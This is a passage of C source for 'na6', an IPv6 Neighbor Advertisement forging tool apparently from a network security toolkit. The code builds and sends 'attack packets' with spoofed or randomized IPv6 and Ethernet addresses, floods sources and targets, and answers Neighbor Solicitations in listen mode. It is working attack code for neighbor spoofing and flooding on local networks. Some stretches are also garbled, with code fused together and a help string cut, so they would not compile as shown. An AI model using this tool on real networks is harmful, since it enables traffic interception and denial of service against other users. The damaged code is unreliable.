Address not valid"); exit(EXIT_FAILURE); } targetaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ targetpreflen = atoi(charptr); if(targetpreflen>128){ puts("Prefix length error in Target Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&targetaddr, targetpreflen); targetprefix_f=1; } break; case 'r': /* "Router" flag */ router_f = ND_NA_FLAG_ROUTER; break; case 'o': /* "Override" flag */ override_f = ND_NA_FLAG_OVERRIDE; break; case 'c': /* Solicited flag */ solicited_f = ND_NA_FLAG_SOLICITED; break; case 'E': /* Target link-layer option */ tllaopt_f = 1; if(ether_pton(optarg, &linkaddr[nlinkaddr], sizeof(struct ether_addr)) == 0){ puts("Error in Source link-layer address option."); exit(EXIT_FAILURE); } nlinkaddr++; tllaopta_f=1; break; case 'e': /* Add target link-layer option */ tllaopt_f = 1; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); (filters.nblockdst)++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'w': /* ND Target Address (block) filter */ if(filters.nblocktarget > MAX_BLOCK_TARGET){ puts("Too many Target Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in Target Address (block) filter number %u.\n", filters.nblocktarget+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocktarget[filters.nblocktarget])) <= 0){ printf("Error in Target Address (block) filter number %u.\n", filters.nblocktarget+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocktargetlen[filters.nblocktarget] = 128; } else{ filters.blocktargetlen[filters.nblocktarget] = atoi(charptr); if(filters.blocktargetlen[filters.nblocktarget]>128){ printf("Length error in Target Address (block) filter number %u.\n", filters.nblocktarget+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocktarget[filters.nblocktarget]), filters.blocktargetlen[filters.nblocktarget]); filters.nblocktarget++; break; case 'W': /* ND Target Address (accept) filter */ if(filters.naccepttarget >= MAX_ACCEPT_TARGET){ puts("Too many Target Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in Target Address (accept) filter number %u.\n", filters.naccepttarget+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.accepttarget[filters.naccepttarget])) <= 0){ printf("Error in Target Address (accept) filter number %u.\n", filters.naccepttarget+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.accepttargetlen[filters.naccepttarget] = 128; } else{ filters.accepttargetlen[filters.naccepttarget] = atoi(charptr); if(filters.accepttargetlen[filters.naccepttarget]>128){ printf("Length error in Target Address (accept) filter number %u.\n", \ filters.naccepttarget+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.accepttarget[filters.naccepttarget]), filters.accepttargetlen[filters.naccepttarget]); filters.naccepttarget++; filters.acceptfilters_f=1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'T': /* Flood targets */ ntargets= atoi(optarg); if(ntargets == 0){ puts("Invalid number of Target Addresses in option -T"); exit(EXIT_FAILURE); } floodt_f= 1; break; case 'F': /* Flood sources */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of sources in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("na6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ puts("Must specify the network interface with the -i option"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, LOAD_PCAP_ONLY) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if(listen_f && loop_f){ puts("'Error: listen' mode and 'loop' mode are incompatible"); exit(EXIT_FAILURE); } if(listen_f && floodt_f){ puts("Error: 'listen' mode and 'flood targets' are incompatible"); exit(EXIT_FAILURE); } if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_NS_FILTER, 0, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); srandom(time(NULL)); if(!(idata.srcaddr_f) && !floods_f){ /* When randomizing a link-local IPv6 address, select addresses that belong to the prefix fe80::/64 (that's what a link-local address looks-like in legitimate cases). The KAME implementation discards addresses in which the second high-order 16 bits (srcaddr.s6_addr16[1] in our case) are not zero. */ if(idata.ip6_local_flag){ idata.srcaddr= idata.ip6_local; } else{ if ( inet_pton(AF_INET6, "fe80::", &(idata.srcaddr)) <= 0){ puts("inet_pton(): Error when converting address"); exit(EXIT_FAILURE); } randomize_ipv6_addr(&(idata.srcaddr), &(idata.srcaddr), 64); } } /* If the flood option ("-F") has been specified, but no prefix has been specified, select the random Source Addresses from the link-local unicast prefix (fe80::/64). */ if(floods_f && !idata.srcprefix_f){ if ( inet_pton(AF_INET6, "fe80::", &(idata.srcaddr)) <= 0){ puts("inet_pton(): Error when converting address"); exit(EXIT_FAILURE); } randomize_ipv6_addr(&(idata.srcaddr), &(idata.srcaddr), 64); idata.srcpreflen=64; } if(!idata.dstaddr_f){ /* Destination Address defaults to all-nodes (ff02::1) */ if( inet_pton(AF_INET6, ALL_NODES_MULTICAST_ADDR, &(idata.dstaddr)) <= 0){ puts("inet_pton(): Error converting all-nodes multicast address"); exit(EXIT_FAILURE); } } if(!idata.hdstaddr_f) /* Destination link-layer address defaults to all-nodes */ if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("ether_pton(): Error converting all-nodes multicast address"); exit(EXIT_FAILURE); } if(tllaopt_f && !tllaopta_f){ /* The value of the target link-layer address */ linkaddr[0] = idata.hsrcaddr; /* option defaults to the Ethernet Source Address */ nlinkaddr++; } /* If the flood target option ("-T") was specified, but no prefix was specified, select the random Target Addresses from the link-local unicast prefix (fe80::/64). */ if(floodt_f && !targetprefix_f){ if ( inet_pton(AF_INET6, "fe80::", &targetaddr) <= 0){ puts("inet_pton(): Error when converting address"); exit(EXIT_FAILURE); } randomize_ipv6_addr(&targetaddr, &targetaddr, 64); targetpreflen=64; } if(!floods_f) nsources=1; if(!floodt_f) ntargets=1; if(!sleep_f) nsleep=1; if(!idata.fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(idata.verbose_f){ print_attack_info(&idata); } /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Fire a Neighbor Advertisement if a IPv6 Destination Address or an Ethernet * Destination Address were specified */ if((idata.dstaddr_f || idata.hdstaddr_f) && (targetaddr_f || floodt_f)){ if(send_packet(&idata, NULL, NULL) == FAILURE){ puts("Error while sending packet"); exit(EXIT_FAILURE); } if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); if(loop_f){ if(idata.verbose_f) printf("Now sending Neighbor Advertisements every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); while(loop_f){ sleep(nsleep); if(send_packet(&idata, NULL, NULL) == FAILURE){ puts("Error while sending packet"); exit(EXIT_FAILURE); } } exit(EXIT_SUCCESS); } } if(listen_f){ FD_ZERO(&sset); FD_SET(idata.fd, &sset); if(idata.verbose_f){ print_filters(&idata, &filters); puts("Listening to incoming ICMPv6 Neighbor Solicitation messages..."); } while(listen_f){ rset= sset; #if defined(sun) || defined(__sun) || defined(__linux__) timeout.tv_usec=1000; timeout.tv_sec= 0; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ #else if((sel=select(idata.fd+1, &rset, NULL, NULL, NULL)) == -1){ #endif if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if defined(sun) || defined(__sun) || defined(__linux__) if(TRUE){ #else if(sel && FD_ISSET(idata.fd, &rset)){ #endif /* Read a Neighbor Solicitation message */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ /* XXX Code assumes no IPv6 Extension Headers */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_ns = (struct nd_neighbor_solicit *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_icmp6= (struct icmp6_hdr *) pkt_ns; /* XXX This should probably be removed when pcap filter problem is solved */ if(pkt_ipv6->ip6_nxt != IPPROTO_ICMPV6 || pkt_icmp6->icmp6_type != ND_NEIGHBOR_SOLICIT || \ pkt_icmp6->icmp6_code != 0) continue; accepted_f=0; if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(filters.nblocklinksrc){ if(match_ether(filters.blocklinksrc, filters.nblocklinksrc, &(pkt_ether->src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocklinkdst){ if(match_ether(filters.blocklinkdst, filters.nblocklinkdst, &(pkt_ether->dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } } if(filters.nblocksrc){ if(match_ipv6(filters.blocksrc, filters.blocksrclen, filters.nblocksrc, &(pkt_ipv6->ip6_src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblockdst){ if(match_ipv6(filters.blockdst, filters.blockdstlen, filters.nblockdst, &(pkt_ipv6->ip6_dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocktarget){ if(match_ipv6(filters.blocktarget, filters.blocktargetlen, filters.nblocktarget, &(pkt_ns->nd_ns_target))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(filters.nacceptlinksrc){ if(match_ether(filters.acceptlinksrc, filters.nacceptlinksrc, &(pkt_ether->src))) accepted_f=1; } if(filters.nacceptlinkdst && !accepted_f){ if(match_ether(filters.acceptlinkdst, filters.nacceptlinkdst, &(pkt_ether->dst))) accepted_f= 1; } } if(filters.nacceptsrc && !accepted_f){ if(match_ipv6(filters.acceptsrc, filters.acceptsrclen, filters.nacceptsrc, &(pkt_ipv6->ip6_src))) accepted_f= 1; } if(filters.nacceptdst && !accepted_f){ if(match_ipv6(filters.acceptdst, filters.acceptdstlen, filters.nacceptdst, &(pkt_ipv6->ip6_dst))) accepted_f=1; } if(filters.naccepttarget && !accepted_f){ if(match_ipv6(filters.accepttarget, filters.accepttargetlen, filters.naccepttarget, &(pkt_ns->nd_ns_target))) accepted_f=1; } if(filters.acceptfilters_f && !accepted_f){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } if(idata.verbose_f) print_filter_result(&idata, pktdata, ACCEPTED); /* Send a Neighbor Advertisement */ if(send_packet(&idata, pkthdr, pktdata) == FAILURE){ puts("Error while sending packet"); exit(EXIT_FAILURE); } } } } exit(EXIT_SUCCESS); } if(!((idata.dstaddr_f || idata.hdstaddr_f) && (targetaddr_f || floodt_f)) && !listen_f){ puts("Error: Nothing to send! (Destination Address or ND Target Address missing?)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ struct dlt_null *dlt_null; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(idata->fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+idata->mtu)){ printf("Unfragmentable part too large for current MTU (%u bytes)\n", idata->mtu); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ memset(&fraghdr, 0, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct nd_neighbor_advert)) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while inserting Neighbor Advertisement header (should be using Frag. option?)"); exit(EXIT_FAILURE); } na= (struct nd_neighbor_advert *) ptr; na->nd_na_type = ND_NEIGHBOR_ADVERT; na->nd_na_code = 0; na->nd_na_flags_reserved = router_f | solicited_f | override_f; na->nd_na_target = targetaddr; ptr += sizeof(struct nd_neighbor_advert); if(tllaopt_f && nlinkaddr==1){ if( (ptr+sizeof(struct nd_opt_tlla)) <= (v6buffer+idata->max_packet_size) ){ tllaopt = (struct nd_opt_tlla *) ptr; tllaopt->type= ND_OPT_TARGET_LINKADDR; tllaopt->length= TLLA_OPT_LEN; memcpy(tllaopt->address, linkaddr[0].a, ETH_ALEN); ptr += sizeof(struct nd_opt_tlla); } else{ puts("Packet Too Large while processing target link-layer address option"); exit(EXIT_FAILURE); } } startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Neighbor Advertisement Message, and * send the attack packet(s). */ int send_packet(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata){ if(pktdata == NULL){ sources=0; } else{ /* Sending a response to a Neighbor Solicitation message */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ns = (struct nd_neighbor_solicit *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); /* If the IPv6 Source Address of the incoming Neighbor Solicitation is the unspecified address (::), the Neighbor Advertisement must be directed to the IPv6 all-nodes multicast address (and the Ethernet Destination address should be 33:33:33:00:00:01). Otherwise, the Neighbor Advertisement is sent to the IPv6 Source Address (and Ethernet Source Address) of the incoming Neighbor Solicitation message */ pkt_ipv6addr = &(pkt_ipv6->ip6_src); na->nd_na_flags_reserved = router_f | solicited_f | override_f; if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr)){ if ( inet_pton(AF_INET6, ALL_NODES_MULTICAST_ADDR, &(ipv6->ip6_dst)) <= 0){ puts("inetr_pton(): Error converting all-nodes multicast address"); return(FAILURE); } if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &(ethernet->dst), ETHER_ADDR_LEN) == 0){ puts("ether_pton(): Error converting all-nodes link-local address"); return(FAILURE); } } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; ethernet->dst = pkt_ether->src; /* Set the "Solicited" flag if NS was sent from an address other than the unspecified address (i.e., the response will be unicast). */ na->nd_na_flags_reserved = na->nd_na_flags_reserved | ND_NA_FLAG_SOLICITED; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* If the Neighbor Solicitation message was directed to a unicast address (unlikely), the IPv6 Source Address and the Ethernet Source Address of the Neighbor Advertisement are set to the IPv6 Destination Address and the Ethernet Destination Address of the incoming Neighbor Solicitation, respectively. Otherwise, the IPv6 Source Address is set to the ND Target Address (unless a specific IPv6 Source Address was specified with the "-s" option), and the Ethernet is set to that specified by the "-S" option (or randomized). */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ if( !idata->srcaddr_f && IN6_IS_ADDR_LINKLOCAL(&(pkt_ns->nd_ns_target)) ) ipv6->ip6_src = pkt_ns->nd_ns_target; else ipv6->ip6_src = idata->srcaddr; ethernet->src = idata->hsrcaddr; sources=0; multicastdst_f=1; } else{ ipv6->ip6_src = pkt_ipv6->ip6_dst; ethernet->src = pkt_ether->dst; sources=nsources; multicastdst_f=0; } na->nd_na_target= pkt_ns->nd_ns_target; } do{ if(floods_f && (pktdata==NULL || (pktdata != NULL && multicastdst_f))){ /* Randomizing the IPv6 Source address based on the prefix specified by "srcaddr" and prefix length. */ randomize_ipv6_addr(&(ipv6->ip6_src), &(idata->srcaddr), idata->srcpreflen); if(!idata->hsrcaddr_f){ randomize_ether_addr(&(ethernet->src)); } if(tllaopt_f && !tllaopta_f){ memcpy(tllaopt->address, ethernet->src.a, ETH_ALEN); } } targets=0; do{ if(floodt_f){ /* Randomizing the ND Target Address based on the prefix specified by "targetaddr" and targetpreflen. */ randomize_ipv6_addr(&(na->nd_na_target), &targetaddr, targetpreflen); } /* * If a single target link-layer address option is to be included, it is included * by init_packet_data() */ if(nlinkaddr==1) linkaddrs=1; else linkaddrs=0; do{ newdata_f=0; ptr=startofprefixes; while(linkaddrsmax_packet_size){ tllaopt = (struct nd_opt_tlla *) ptr; tllaopt->type= ND_OPT_TARGET_LINKADDR; tllaopt->length= TLLA_OPT_LEN; memcpy(tllaopt->address, linkaddr[linkaddrs].a, ETH_ALEN); ptr += sizeof(struct nd_opt_tlla); linkaddrs++; newdata_f=1; } na->nd_na_cksum = 0; na->nd_na_cksum = in_chksum(v6buffer, na, ptr-((unsigned char *)na), IPPROTO_ICMPV6); if(!idata->fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); return(FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + ETHER_HDR_LEN); fptrend = fptr + ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); return(FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n"\ , (LUI) nw, (LUI) (ptr-buffer)); return(FAILURE); } } } }while(linkaddrs\n" "Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ if(floods_f) printf("Flooding the target from %u different IPv6 Source Addresses\n", nsources); if(floodt_f) printf("Flooding the target with %u ND Target Addresses\n", ntargets); if(!floods_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!idata->hsrcaddr_f)?" (automatically-selected)":"")); } else{ if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else puts("Ethernet Source Address: automatically-selected"); } /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f || idata->hdstaddr_f){ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, \ ((!idata->hdstaddr_f)?" (all-nodes multicast)":"")); } if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f && !(idata->srcprefix_f)){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (automatically-selected)":"")); } else{ printf("IPv6 Source Address: randomized, from the %s/%u prefix%s\n", psrcaddr, idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); } /* 